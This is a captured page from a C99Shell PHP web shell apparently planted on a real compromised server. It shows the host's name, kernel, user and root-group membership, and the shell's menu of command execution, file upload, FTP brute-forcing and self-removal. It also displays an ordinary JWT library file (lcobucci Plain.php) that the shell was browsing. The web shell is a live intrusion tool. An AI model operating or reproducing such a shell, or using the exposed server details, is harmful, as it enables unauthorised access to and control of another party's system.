!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html_v5_10/vendor/lcobucci/jwt/src/Token/   drwxr-xr-x
Free 28.63 GB of 117.98 GB (24.26%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Plain.php (2.23 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
declare(strict_types=1);

namespace 
Lcobucci\JWT\Token;

use 
DateTimeInterface;
use 
Lcobucci\JWT\Token as TokenInterface;

use function 
in_array;

final class 
Plain implements TokenInterface
{
    private 
DataSet $headers;
    private 
DataSet $claims;
    private 
Signature $signature;

    public function 
__construct(
        
DataSet $headers,
        
DataSet $claims,
        
Signature $signature
    
) {
        
$this->headers   $headers;
        
$this->claims    $claims;
        
$this->signature $signature;
    }

    public function 
headers(): DataSet
    
{
        return 
$this->headers;
    }

    public function 
claims(): DataSet
    
{
        return 
$this->claims;
    }

    public function 
signature(): Signature
    
{
        return 
$this->signature;
    }

    public function 
payload(): string
    
{
        return 
$this->headers->toString() . '.' $this->claims->toString();
    }

    public function 
isPermittedFor(string $audience): bool
    
{
        return 
in_array($audience$this->claims->get(RegisteredClaims::AUDIENCE, []), true);
    }

    public function 
isIdentifiedBy(string $id): bool
    
{
        return 
$this->claims->get(RegisteredClaims::ID) === $id;
    }

    public function 
isRelatedTo(string $subject): bool
    
{
        return 
$this->claims->get(RegisteredClaims::SUBJECT) === $subject;
    }

    public function 
hasBeenIssuedBy(string ...$issuers): bool
    
{
        return 
in_array($this->claims->get(RegisteredClaims::ISSUER), $issuerstrue);
    }

    public function 
hasBeenIssuedBefore(DateTimeInterface $now): bool
    
{
        return 
$now >= $this->claims->get(RegisteredClaims::ISSUED_AT);
    }

    public function 
isMinimumTimeBefore(DateTimeInterface $now): bool
    
{
        return 
$now >= $this->claims->get(RegisteredClaims::NOT_BEFORE);
    }

    public function 
isExpired(DateTimeInterface $now): bool
    
{
        if (! 
$this->claims->has(RegisteredClaims::EXPIRATION_TIME)) {
            return 
false;
        }

        return 
$now >= $this->claims->get(RegisteredClaims::EXPIRATION_TIME);
    }

    public function 
toString(): string
    
{
        return 
$this->headers->toString() . '.'
             
$this->claims->toString() . '.'
             
$this->signature->toString();
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0059 ]--